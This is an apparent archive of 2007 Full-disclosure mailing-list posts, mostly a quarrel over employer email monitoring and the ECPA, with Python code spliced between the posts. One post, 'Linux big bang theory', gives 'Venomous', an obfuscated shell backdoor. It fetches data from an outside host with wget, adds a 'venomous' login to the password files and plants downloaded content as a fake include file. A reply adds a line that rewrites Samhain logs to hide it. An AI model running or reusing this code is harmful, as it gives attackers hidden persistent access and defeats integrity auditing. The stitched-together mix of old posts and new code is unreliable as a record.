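    f'203.0.113.7 - - [05/Jun/2007:19:16:42 -0500] "GET {CANARY_PATH} HTTP/1.1" '
    '404 211 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) Safari/419.3"',
    '198.51.100.9 - - [05/Jun/2007:19:20:01 -0500] "GET /index.html HTTP/1.1" '
    '200 1532 "-" "curl/7.15"',
    "not a log line at all",
]
NAME_DERIVED_PATH = "/" + hashlib.md5(b"theirname\n").hexdigest()


def demo():
    """Scan the constructed log for hits on the issued canary."""
    return REGISTRY.scan(SAMPLE_LOG)


if __name__ == "__main__":
    for hit in demo():
        print(f"{hit.when.isoformat()} {hit.ip} fetched canary for "
              f"{hit.recipient} (HTTP {hit.status}) via {hit.user_agent}")
```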

Re: [Full-disclosure] You shady bastards.

2007-06-06 Thread J. Oquendo

Tim wrote:

Why would it be illegal if his former employer accessed his email using
this method. The information going to their network is considered their
property and they could do as they see fit.



This is a poor assumption.  See the Wiretap Act and the Electronic
Communications Privacy Act.  Of course these are just US laws, but it
seems this is the scenario we're discussing.

tim



Spare me and the list...

/ * SNIPPED * /
What about an employer's right to read e-mails as
they come in? As they hit the inbound server? ...
If the e-mail is not subject to the consent of
all parties, and one of the parties (either the
sender or recipient) lives in a jurisdiction
that mandates all party consent, then this could
be an unlawful interception under state law.
(Federal law requires only one party consent.)


http://www.securityfocus.com/print/columnists/412

*NOTE Federal Law*
/* END SNIP * /

Or search ... Nancy K. Garrity, et al. v. John Hancock Mutual Life Ins. Co

And no I won't bother with US v. Councilman

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato





Re: [Full-disclosure] You shady bastards.

2007-06-06 Thread J. Oquendo

Tim wrote:


Spare you what?  If this is somehow off topic, please elaborate.

Spare me and the list legalities. One, it is slightly off-topic; then
again, this is FD, so I retract.


That entire argument and any thread arising from what is legal and what
is not is likelier to be answered, dissected, studied on a legal forum.

Right, so under federal law, single party consent is sufficient.  If HD
didn't consent, and the former employee currently doesn't consent (i.e.
consent under the AUP or other agreements has expired), then it could be
illegal.  That, or if the person reading the stored communications is
not authorized by the company, then they would be personally liable.

Laws are not about what could or should. They're about what's written.
In this case, he sent an email to someone's former workplace. The
worker was not there, the employer obviously read the email. So the
questions to ask should be: 1) HD didn't give consent, did/does the
employer have something written to their employees which states the
monitoring of email?

If they do, case closed: there is the one party federal consent.

Secondly, did HD specify in his email any legalities of unauthorized
reading? No.


Thirdly, you need to realize what you've stated and your
misinterpretation of the law.

ECPA protects against INTERCEPTION. No interception occurred here, the mail
was delivered to a recipient.

Your conjecture that it's legal because the employer somehow owns the
communication or the networks it travels over is completely bogus. The
recipient is this email user, not the company.

The network is the company's and all of its communications into or out
are property of the company.


http://www.redearthsoftware.com/email-monitoring-article.htm
Email auditing and email interception

A second distinction to make is the difference between email auditing
(sometimes called email monitoring), where email is checked after the
actual transmission, and email interception (sometimes called email
filtering), where email is intercepted and checked during transmission.



Yup just looked this up.  This was thrown out because Nancy consented
under JH's email privacy policy.  I don't see how this conflicts with my
argument.

tim


Rinse and repeat this post and my comments..


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato





Re: [Full-disclosure] You shady bastards.

2007-06-06 Thread J. Oquendo

Tim wrote:

As mentioned multiple times by multiple posters, but apparently eluded
your reading, the recipient's consent:

 A) May have never been given
 B) May have expired with the employment contracts
 C) May not apply at all if the monitoring party was not given
    authorization by the company


You're basing your arguments on assumption...

A) I don't know ... Do you?
B) Most contracts have expiry dates on NDA's if signed. More than likely
with a security company.

C) You don't know. I don't know.

We can infer from B) and C) that 1) recipient worked for a security
company. 2) More than likely signed an NDA or contractual agreement.
3) Because they are a security company in place, they *should have*
had some form of policy in place detailing things.

So if 2 and 3 are correct, there is no law broken period. So re-posting:

/ *SNIPPET * /

Courts have held that the wiretap law required interception in
transmission before - finding that seizing of a computer gaming
company's email, perusing a secure website under false pretenses,
reading an independent insurance agent's corporate email, installing
and using tracking cookies, and even hacking into a computer and
retrieving email does not violate the wiretap law.

/ * STOP FOR A SECOND * /

See the last sentence?

/* SNIPPET * /
The courts have observed that to intercept something, according to the
dictionary, is to stop, seize, or interrupt in progress or course
before arrival and therefore that a contemporaneous interception -
i.e., an acquisition during flight - is required to implicate the
Wiretap Act.

/* STOP AGAIN */

See this last sentence?

/* SNIPPET */
Several court cases have upheld that checking email after transmission
is legal (i.e. email auditing), since it is viewed as no different
than searching through a file in an employee's drawer.

/* END SNIPPET */

So before I go on... May I ask you how many times have you dealt with
these issues or anything like them in court? Care to ask me the same?

See: The Ordinary Course of Business Exception
http://www.law.duke.edu/journals/dltr/articles/2001dltr0026.html
http://www.theregister.co.uk/2004/07/05/close_email_wiretap_loophole/
http://thomas.loc.gov/cgi-bin/query/z?c109:S.936:

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato





Re: [Full-disclosure] You shady bastards.

2007-06-06 Thread J. Oquendo

Tim wrote:

This definitely could apply in the case of the ECPA, but could get
dicey, since ordinary course of business is ill-defined and I suspect
would require some serious legal wrangling to argue.  Does this business
regularly read everyone's email?

In any case, whether they were legally permitted to monitoring that email
box or not, you really should work on your debate skills.  Attacking one
point by changing to another doesn't take the discussion anywhere.  The
offensive tone your initial emails took on was really unwarranted.
There's no need to make every thread a flame war.

tim

AGAIN... VERBATIM, NOT MY *SUGGESTION/NOTION/INFERENCE*

/ * PLAIN ENGLISH VERSION * /
http://republicans.energycommerce.house.gov/107/Hearings/04032001hearing154/Lamb234.htm


V. Electronic Communications Privacy Act

The Electronic Communication Privacy Act of 1986 (ECPA), 18 U.S.C.
2510-2522; 2701; was enacted to address potential privacy issues related
to the growing use of computers and other new forms of electronic
communications. It added provisions to the federal criminal code that
extended the prohibition against the unauthorized interception of
communications to specific types of electronic communications, including
e-mail, pagers, cellular telephones, voice mail, remote computing services,
private communication carriers, and computer transmissions. The Act also
identified situations and types of transmissions that would not be
protected, most notably an employer's monitoring of employee electronic
mail on the employer's system.

/ * END * /

Do you see or not see the sentence "not be protected, most notably an
employer's monitoring... EMPLOYER'S SYSTEM"? Do you not see the plain
English wording "unauthorized interception of"? Now take good note of
this from someone who has been to court... Everything is as broad as
broad can be. It's purposefully done this way if you ask me and the
arguments come out AFTER the fact, hence new cases being cited and
quoted. So literally the law states "unlawful intercept" and "would not
be protected... employer monitoring", so take these two things literally
assuming it were you in a court of law, you being the employer.

Defense: Client violated the ECPA act foo
Plaintiff: There was NEVER AN INTERCEPTION. The email was DELIVERED to
his EMPLOYER'S SERVER


Point blank. Unless you cite another case where some company was
found guilty of snooping to argue this, point is moot. And I am not
just talking or inferring anything. I've posted ENOUGH information
to give you a clue about FACTS not inferences.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g'

Wise men talk because they have something to say;
fools, because they have to say something. -- Plato





[Full-disclosure] ECPA Plain English 101 Employer vs. Employee

2007-06-06 Thread J. Oquendo

Cyberspace Law Institute

http://www.cli.org/emailpolicy/ECPA.html

/* BOTTOM LINE LEGALESE */

The special limitations on disclosure of private email, in ECPA, 
expressly apply only to those who provide electronic communications 
services to the public -- and an internal system provided by an employer 
to employees would not be so characterized.



The ECPA also permits access to private communication with
the consent of either the sender or the recipient. Employees
may (have to...) agree to such access (by authorized persons)
in the email policy of the company.

But even if there is no agreement the ECPA only prohibits
interception in real-time transmissions; email is usually
(or at least can be) stored and can be accessed by the system
administrator who usually will be the employer.

http://www.law.duke.edu/journals/dltr/articles/2001dltr0026.html
http://www.theregister.co.uk/2004/07/05/close_email_wiretap_loophole/
http://thomas.loc.gov/cgi-bin/query/z?c109:S.936:
http://email.about.com/library/weekly/aa080398a.htm



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato





Re: [Full-disclosure] You shady bastards.

2007-06-06 Thread J. Oquendo

Dude VanWinkle wrote:

On 6/6/07, Larry Seltzer [EMAIL PROTECTED] wrote:

Really? I have gotten benefits and medical communications at my office
addy.

That stuff should be going to your home address, not least for this
reason.




Is should relevant? Is it a violation of HIPAA to read these
communications, even if I have these communications sent to my work
addy?


any lawyers on the list?

-JPwho's Draft was autosaved at 2:49 pm



Medical and Workplace Privacy
http://lorrie.cranor.org/courses/fa04/work2.ppt

Permits identification of the individual (or creates a reasonable basis
upon which to identify the individual)

45 CFR §164.501

Also see Office Snooping:

The information was learned in a routine audit of the company's health
plan for fraud, drug abuse, and excessive costs.
No prohibition against employers making use of medical records in
employment decisions.

All co-employees had a “need to know”



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato





Re: [Full-disclosure] Linux big bang theory....

2007-05-21 Thread J. Oquendo

Vincent Archer wrote:

On Sun, 2007-05-13 at 23:07 -0700, Andrew Farmer wrote:
This script really doesn't prove anything, though. All it shows is
that a compromised machine can be difficult to impossible to clean
properly - which has been known for a *long* time. Ken Thompson
discussed a much cleverer one in Trusting Trust. It's also worth
noting that this is in no way specific to UNIX systems. It's simply
an unalterable fact that, once an attacker has had full access to the
machine, it's possible for them to make changes which will allow them
reentry at a later date.



I don't have (and I doubt anybody around here can) the proof to make
this a theorem, but it is a good postulate:

- It is impossible to prove the integrity of a computing system from
within the same system.

In olden days, this created the fundamental rules for systems like
Tripwire: place the signatures on non-alterable storage, run tripwire in
single user mode (ahh, the naive assumption that single user mode would
be safe enough).

Today, the preferred method of checking the integrity of a system
involves virtualisation of said system, and verification from the
hosting component of the hosted one. Or the hammer approach of erasing
the state of the system after use, and rolling it back to a proven
safe and stable one.


I've added a function to hide the script from showing up on Samhain
awk -vfilename=$filename '{print perl -pi -e 
'\''s/'$filename'/samhain/g'\''}' /var/log/samhain_log|sh


What it does when run now is look for the instance of its name (the
backdoor's name) and rename it to Samhain. So if the file created
is called foo.h and Samhain logs it, it will go and rename foo.h
in the logs to Samhain. Tripwire is no different unless both logs
are kept offline. On a side note, I started tinkering with a triple
threat mechanism of checksums: (SHA1 + MD5 + RIPE160)

http://www.infiltrated.net/scripts/saki.html

Just don't know if I want to devote time to doing a full blown
program. It works as is, but does nothing more than checksum
whatever is in my current path of which later I can do a diff
etc.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




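
The offline-baseline rule Vincent describes and the multi-digest checksum idea in the reply, as an added example in Python (not the saki script or anything else from the thread): it hashes a directory tree with MD5, SHA-1 and RIPEMD-160 where the OpenSSL build offers it, then diffs a later scan against the stored baseline, catching the dropped header-named file and the altered file that the PoC in this thread counts on going unnoticed. The sample include tree is constructed inside a temporary directory.

```python
"""Offline file-integrity baseline (added example; not code from the thread).

Hashes every regular file under a directory with MD5, SHA-1 and, when the
OpenSSL build provides it, RIPEMD-160, and diffs a later scan against the
saved baseline. The baseline must be stored where the monitored host cannot
write it (Vincent's Tripwire rule); this module only hashes and compares,
the storage location is the operator's choice.
"""
import hashlib
import json
import tempfile
from pathlib import Path

ALGORITHMS = ("md5", "sha1", "ripemd160")
CHUNK = 64 * 1024


def file_digests(path):
    """Digest one file with every available algorithm in a single read pass."""
    hashers = {}
    for name in ALGORITHMS:
        try:
            hashers[name] = hashlib.new(name)
        except ValueError:
            pass                       # e.g. ripemd160 absent from OpenSSL 3
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK), b""):
            for h in hashers.values():
                h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def build_baseline(root):
    """Map relative path -> digests for every regular file under root.

    Symlinks are skipped so a link pointing outside root is never baselined.
    """
    root = Path(root)
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            baseline[p.relative_to(root).as_posix()] = file_digests(p)
    return baseline


def save_baseline(baseline, dest):
    Path(dest).write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(src):
    return json.loads(Path(src).read_text())


def compare(baseline, current):
    """Classify differences; a file is modified if any shared digest differs."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(
        name for name in set(baseline) & set(current)
        if any(baseline[name].get(a) != current[name].get(a)
               for a in ALGORITHMS
               if a in baseline[name] and a in current[name])
    )
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed scenario: baseline a fake include tree, then do what the
    thread's PoC does (drop a new header-named file, alter an existing one)
    plus delete one file, and report what the comparison catches."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "usr" / "include"
        root.mkdir(parents=True)
        (root / "paths.h").write_text('#define _PATH_BSHELL "/bin/sh"\n')
        (root / "sysexits.h").write_text("#define EX_OK 0\n")
        (root / "unistd.h").write_text("/* constructed */\n")
        store = Path(tmp) / "baseline.json"     # stands in for offline media
        save_baseline(build_baseline(root), store)

        (root / "foo.h").write_text("/* dropped after the baseline */\n")
        (root / "paths.h").write_text('#define _PATH_BSHELL "/tmp/sh"\n')
        (root / "unistd.h").unlink()

        return compare(load_baseline(store), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```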

Re: [Full-disclosure] Linux big bang theory....

2007-05-10 Thread J. Oquendo

KJKHyperion wrote:



why, Windows machines of course, I'm an attacker, not a fool! If you 
were a terrorist, what would you rather do?


Crash the Twin Towers
Crash the dollar

There is no such thing as an attacker. All actions, even such an 
individual's, are driven by economical considerations.

With this said, if I were an attacker with economics in mind
why would I want to target a machine which has X amount of
vendors sifting through the muck of malware and viruses when
I could spawn off a semi-undetectable program and KEEP IT
THERE without having to wait for the next best thing.

I don't know about your logic on economics, but if I were
the attacker and I was looking for a constant steady stream
of revenue, I would go the Linux route. And if you think
for a second that Boohoo Linux users are more inclined to
be security-conscious, then you are the fool here. Of the
couple of thousand brute force bots I see, none are on
Windows.

Whatever though, to each their own mechanisms of thought.
If you truly believe it's all fine and dandy and things
won't get progressively worse by giving Linux to
inexperienced users, you are in for a rude awakening. If
you haven't stopped to read the facts that malware, *ware
creators are getting more savvy, then you seem to be
stuck somewhere in a world of fantasy.



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato





[Full-disclosure] Linux big bang theory....

2007-05-09 Thread J. Oquendo

Enjoy||Complain

# !/bin/sh
# Venomous
# Linux PoC backdoor keeper...
# http://www.infiltrated.net/ubuntuDestruction.php
# J. Oquendo (c) 05/09/2007 


# If you have to ask you shouldn't run this password for venomous
# is password


happy=`awk 'NR==59 {gsub(//,);print $3}' /usr/include/paths.h`
days=`awk 'NR==74 {gsub(/,/,);print $8}' /usr/include/sysexits.h`
guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'`
sed -n '1p' $happy|awk -F : 'BEGIN{OFS=:}{$1=venomous}1{$2=}2'  $days
sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F : 
'BEGIN{OFS=:}{$2='guitar'}2'  $happy
what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`
who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, ){print $4 
-a}'`
echo Enter your email address ; read ans ; where=$ans
$who | $what $where


# Ugly method too keep a rootaccount Follows... For those not in the know...
# Venomous was an idea made to prove a point, not give script kiddiots another
# tool to be morons with. Instead of ruining things, how about solving...
# Instead of naysaying... Prove me wrong


# Pick a ranDumb file in /usr/includes/ then create the samevbackdoor on the
# system using this filename. Do something sneaky on your own to place this
# file on a startup I could show you, but then I would have to kill -9 you

# Note the location... Highly doubtable to remove an actual include file
# unless some stupid admin did something really dumb... Before someone mouths
# around via e-mail... I could have written this all inclusively but I chose
# not to for obvious reasons...

random=`date|awk -F : '{print $3}'|awk '{print $1}'`
echo $random  /tmp/secCommand
sad=`awk '{print ls /usr/include|sed -n '\''$1p'\''}' /tmp/secCommand|sed 
-n '1p'`
rm /tmp/secCommand
filename=`echo $sad|sh|awk -F . '{print $1}'`

lynx -dump http://www.infiltrated.net/ubuntuDestruction.php|sed -n '226,233p' 
 /usr/local/include/$filename.h

# Now of course I could have modified this to replicate any one of the files
# on startup but again... PoC ... The naysayers will ramble on about You're
# out of your mind... Am I? I've given you the PoC's what more do you want...
# Ubuntu or any Linux for the lowly home user is a horrible idea...

# And AGAIN before someone fires off I would see the URL and that's a dead
# giveaway! ... Look, I'm trying to make a point here... I could have 
# a functioning backdoor undetectable to most integrity checkers, Samhain,

# Tripwire etc., but why should I disclose this anywhere. It's not in the
# best interest of anyone to do so... Don't bother asking for it via email
# because it's not public and will never be...

# This again... Was to prove a point to the naysayers who this shit doesn't
# happen... Keep dreaming. Its only a matter of time before you guys go
# Goo Goo about getting Linux for Idjits off the ground, but its a horrible
# mistake in the making


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato





[Full-disclosure] Anyone have a Lindows/Linspire contact

2007-04-19 Thread J. Oquendo


Sorry to ask this of anyone on this list... If it bugs someone
please respond offlist no need to irritate others more than I
already have...

I'm hoping someone could provide me with a direct contact for
someone in Lindows/Linspire/*whatever*umbrella*name. Seems
they have a security issue on their hands... Tried getting
information from their fluffy website, no dice.

Tried whois, etc., no direct names available...


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




[Full-disclosure] Follow up browser DoS

2007-04-17 Thread J. Oquendo

Comments on Firefox 2.0.3 ... Mine hangs then regains its composure after
about 2 solid minutes of being stuck in hell.


Did nothing to Opera on Windows, OpenBSD or Linux...

Seemed to also toast out Firefox on FC5. Caused system to respond horribly.

[EMAIL PROTECTED] ~]# yum update firefox
Loading installonlyn plugin
Setting up Update Process
Setting up repositories
core [1/3]

.

--> Populating transaction set with selected packages. Please wait.
---> Downloading header for firefox to pack into transaction set.
firefox-1.5.0.10-1.fc5.i3 100% |=|  82 kB00:00
---> Package firefox.i386 0:1.5.0.10-1.fc5 set to be updated
--> Running transaction check

Dependencies Resolved

=
Package Arch   Version  RepositorySize
=
Updating:
firefox i386   1.5.0.10-1.fc5   updates18 M

Transaction Summary
=
Install  0 Package(s)
Update   1 Package(s)
Remove   0 Package(s)
Total download size: 18 M
Is this ok [y/N]: y
Downloading Packages:
(1/1): firefox-1.5.0.10-1 100% |=|  18 MB01:27
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
 Updating  : firefox  # [1/2]
 Cleanup   : firefox  # [2/2]

Updated: firefox.i386 0:1.5.0.10-1.fc5
Complete!

Copied and pasted top information ... Took me 3 minutes to actually copy
and paste the information...

Tasks: 118 total,   1 running, 116 sleeping,   0 stopped,   1 zombie
Cpu(s): 73.7% us, 25.3% sy,  0.0% ni,  0.0% id,  0.0% wa,  1.0% hi,  0.0% si
Mem:   1034412k total,  1019464k used,14948k free, 1600k buffers
Swap:  2031608k total,   317436k used,  1714172k free,41184k cached

 PID USER  PR  NI  VIRT  RES  SHR S %CPU %MEMTIME+  COMMAND
27474 root  18   0 1178m 838m  17m D  1.0 83.0   0:21.43 firefox-bin


[EMAIL PROTECTED] ~]# killall -9 firefox-bin
firefox-bin: no process killed
[EMAIL PROTECTED] ~]# killall -9 firefox-bin
[EMAIL PROTECTED] ~]#

Killed it once... Nope... System didn't even acknowledge it. Stood running for
a few seconds till I killall -9'd it again. Damn you firefox!



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] INVASION OF THE CHILD HACKERS

2007-04-16 Thread J. Oquendo

Dr. Neal Krawetz, PhD wrote:


However and the thing that really got my attention was the age
range. They say “ages 3 and older”. What kind of 3-year-old is
surfing the web and using IM, and sending email? Between 3 and 5
years old and most children are just starting to learn the
alphabet. The average 5-year-old should be able to read simple
words. Granted, there are some online games for tots and is that
really the same as using the Internet? (Use a VCR or DVD player?
Sure and I've seen 2-year-olds do that… But a tot surfing the web?
Really?)


Why can't you picture a 3 year old using the Internet. There are a lot
of resources available for kids. A computer can be setup with bookmarks
for tots, e.g. Cartoon Network, Sesame Street, etc.,



All of this makes me wonder… How soon before the RIAA begins suing
3-year-olds for illegal downloads? I mean and they have already
gone after a 7-year-old. (And the 7-year-old was female.
Coincidence? I think not!)  Also, with this many young females
online, I might need to trade my significant other M. in for a more
attractive model.  ;-)

One could infer you mean a child from your comment. "I might need to
trade my significant other... for a more attractive model..." You
mention this in the same paragraph as you mention children.



EHAP WATCH OUT!


For what

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] Let's Winnuke Google!

2007-04-12 Thread J. Oquendo

[EMAIL PROTECTED] wrote:

information that can be derived from an IP address.) I doubt that
Google is a private company that generates revenue off of their
targeted advertising expertise, and there is absolutely no
legitimate value in this information to anyone. While it is
acceptable to ignorantly profile based on ethnicity and
nationality, it is not acceptable to analyze marketing statistics
based on geographic location. No good can come from this!


Yawn, yawn and more yawn. Google is a publicly traded company.

Your comments about targeted advertising based on geographic
locations are wrong. If you own a ski supply company, what
purpose would it serve to have ads dished out to people in,
I don't know, say, Las Vegas or Miami?

As for the rest of this rambling... Old and inaccurate news.



Re: [Full-disclosure] Stereotyping DoS and Don'ts

2007-04-04 Thread J. Oquendo

[EMAIL PROTECTED] wrote:

I infer you're under the impression that this may be some form of
de-facto profiling of DoS kiddiots. But ask yourself, how hard
would it be to take any of the given information you disclosed
for an attacker in, say, America to be punctual in his attacks
so that they may now mimic your mentioned Western European or
Chinese attackers?

  * The USA and Canada are stereotypical in that they are not
 extreme in any single dimension. An attack may not start precisely
 at 1:00, but it will be around 1:00, it may not be homogeneous,
 but it will be close. And it may change as needed rather than
 exhaust one attack method. Americans are also more solitary. You
 won't see a hundred American hackers working in unison on the same
 target as you would in China or Brazil.

Assumptions. Back in the mid to late 90's American script kiddiot
groups were known for throwing their tags all over webpages.
Groups ranged in size and judging by some of the IRC channels
and forums of those times, some of these channels and groups
were rather large. If you take a look at say Electronic Disturbance
Theater, the numbers could have exceeded your best guesses, they
were coordinated on a worldwide scale and they were on time.
Regardless of the fact that they may have been American
or Chinese.

  * The recent DoS against the root level DNS servers started
 exactly on the hour. At intervals of 1 hour, there were changes to
 the attack method. Both the Western Europe and China match this
 kind of attack: precisely timed, planned, homogeneous, and
 exhaustive.

It's nice to assume but I could spend a day poking holes in
your theory.

  * Similar to Blue Frog, the Smurf attacks from Mafiaboy were not
 precisely timed, but were exhaustive, showed short-term planning,
 and were independent attacks. Mafiaboy was Canadian.

What you think you may know based on media accounts just might
be wrong. For those on the greyhat scene in tune to what was
going down at the time, most will know mafiaboy wasn't the sole
culprit albeit he took the brunt of it all. I won't get into
more than that.

 Stereotyping and profiling is commonly criticized for its
 inaccuracy.

Assumptions should be criticized for providing vague
information; however, it's a nice idea but filled with too many
holes. While your idea sounds interesting, you're missing many
of the essential FACTS to quantify the whole case on building a
"Who is DoS'ing Your Servers" movement.

So to help you a bit more... Here are some profiles to add:

Swedish attackers:
They will ponder if they want to actually partake in the DoS.
They'll sit back and think whether it is a fair war to get
into, or whether they should sit back and let others attack
as to not involve themselves in that war.

Spaniards: They'll plan to attack at 1PM their time but
the attack won't begin until 4PM as an attack will end up
interfering with their siesta. A Spaniard will never
attack during siesta time.

Irish attackers. Although they'll meticulously plan the
attack, due to the fact they sidestepped into a pub, by
the time the attack is set to start, they'll likely be
too drunk to initiate it.

Nigerian attackers. They'll plan out a massive DoS
attack but sidestep it in order to offer their victims
a wire transfer of $10,000,000,000.00 from their
deceased uncle Jimbobzinunu.

On a serious note, I find it a bit strange that many
who haven't been on the scene for quite some time
point out modified histories of what occurred. Perhaps
it's time for a tell-all book to be written about the
so-called hacker/cracker scene from the mid nineties
through now.


Re: [Full-disclosure] Stereotyping DoS and Don'ts

2007-04-04 Thread J. Oquendo

[EMAIL PROTECTED] wrote:



History is always written by the winning side.


I couldn't agree more

On the flip side, is there actually *any* one person who's in a position
to give the real scoop on how things looked from the hacker/cracker side
of the fence for that decade?

I think there are about two handfuls that I know of that can place it all
together but I also know in doing so many careers could be ruined as well
as current businesses to some degree.


I can think of a bunch of people who could
talk about their corner of the scene, but by 1990 it was big enough that
no one person could know all of it other than by hearsay


Of the people I had in mind, it definitely would not be hearsay. When I
describe the 90's I'm talking about the mid through late 90's, and I mean
this in the sense of those who were making noise on the scene with their
attacks - keep in mind the original post was about script kiddiots (DoS),
so I believe for that portion of individuals who were out attacking
sites, defacing, etc., it would be easier than you think to put the
puzzle together, name names, and give accounts of what truly happened.

Would be an interesting read, but the author would also face the wrath
of feds because they could possibly expose snitches, informants, rats,
however you want to call them.


[Full-disclosure] Cisco IP Phone vulnerability

2007-03-31 Thread J. Oquendo
-BEGIN LSD SIGNED MESSAGE-

Infiltrated.net Security Advisory:
Cisco IP Phone Denial of Service
http://www.infiltrated.net/ciscoIPPhone7960.html
Revision 6.9

For Public Release

Summary
The Cisco IP Phones are subject to a denial of
service.

This vulnerability has not yet been documented
by Cisco but it should be allocated the bug ID
31337 by staff @ PSIRT

This advisory will be posted at
http://www.infiltrated.net/ciscoIPPhone7960.html

Affected Products
All Cisco IP Phones

Proof of Concept
http://infiltrated.net/7960poc.jpg

Cisco Security Procedures
Complete information on reporting security
vulnerabilities in Cisco products, obtaining
assistance with security incidents, and
registering to receive security information from
Cisco, is available on Cisco's website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html 
All Cisco security advisories are available at 
http://www.cisco.com/go/psirt.


Details
Cisco IP Phones are subject to a denial of service.
Users who disconnect their ethernet cables will
lose their dial tones and their present call will
drop as well as subsequent incoming calls.

While the attack may be local at present time,
security engineers Infiltrated Networks (a division
of Fscker Inc. with no relation to Halliburton)
are devising telekinetic attacks along with Miss
Cleo in order to provide a working disconnection
attack tool.


Impact
All your phone sex belongs to null 0

Software Versions and Fixes
The only fix is to plug your phone back into a PoE
switch or plug in its power cord.

Obtaining Fixed Software
Infiltrated Networks and Fscker Inc. is offering
its services at the low price of $1000.00 an hour
in consulting fees to remedy this attack, with a
100 hour minimum retainer fee. In fact, for those
seeking to purchase a PoC code of the mentioned
vulnerability, contact us, we'll gladly take your
milk money.

Workarounds
Don't unplug your phone. Don't unplug your PoE
switches. Don't live in areas where electricity
is sporadic. Don't play with matches, and don't
drive while under the influence of anything that
is currently mentioned at http://www.bumwine.com

Exploitation and Public Announcements
Infiltrated.net is not aware of any public
announcements or malicious use of the
vulnerability described in this advisory.

This vulnerability was reported to us
losers, by another bigger loser who wishes
to retain his or her anonymity out of
fear of obtaining Michael Lynn Disease
where a frivolous denial of service attack
via litigation will ensue and weaken the
immune system.

Status of This Notice: FINAL
This is a final Infiltrated.net advisory. Although
we cannot guarantee the accuracy of all statements
in this notice, we still passed it on to you the
consumer knowing full well a cease and desist letter
will be sent and added to our collection. All of the
facts have however been checked to the best of our
ability while not under the influence of Prozac,
Valtrex, Valium, Lithium and lest we forget, weapons
of mass destruction of which you will not find since
we have them buried in the secret stash boxes of our
Nissan, Lexus, WRX, and Cherokee alongside our Glocks.


Revision History
Revision 6.9    Initial public release



This notice is Copyright 2007 by Infiltrated.net.
This notice may be redistributed freely after the
release date given at the top of the text,
provided that redistributed copies are complete
and unmodified, and include all date and version
information. Pictures of your fiance, wife,
girlfriend can be e-mailed to us if said
individuals did not yet e-mail to us on their
own. Infiltrated Networks, sil, and our oddball
affiliates remind those on the security scene to
keep it real. 




Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo

Thierry Zoller wrote:

Dear All,

You are arguing over hypothesises where facts could rule. PLEASE someone
just setup the script on a test environment and present us your
results. Heck, it's not that we are discussing Metaproblems here,
these are computers.

Just install and make a PoC and enhance security for all
for the sake of it. Thanks :)


  
The problem with the whole thread was "well, someone could do XXX". Sure
they could... Anyone could... My point was someone shooting a message
back to the list stating "Your program is a backdoor." It never was and
it never will be. Can someone modify it on their own and make it a
backdoor? Sure. Can someone inject something into the columns I was
parsing? Possibly. Anything is possible. Since then I re-wrote the arguments
people were griping about:


ifaddr=`ifconfig -a|awk '/inet/ && !/inet6/ && !/127.0/ && !/192.168/{print $2}'|sed 's/addr\://g'`


function IPT {

grep -E '(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' /etc/hosts.deny|\

awk '!/#/ && /\./ && !a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}'|\

awk '/iptables/ && !/#/ && !/-s  -i/'|sh

}

The complaint was "anyone can insert $foo into the thirteenth column..."
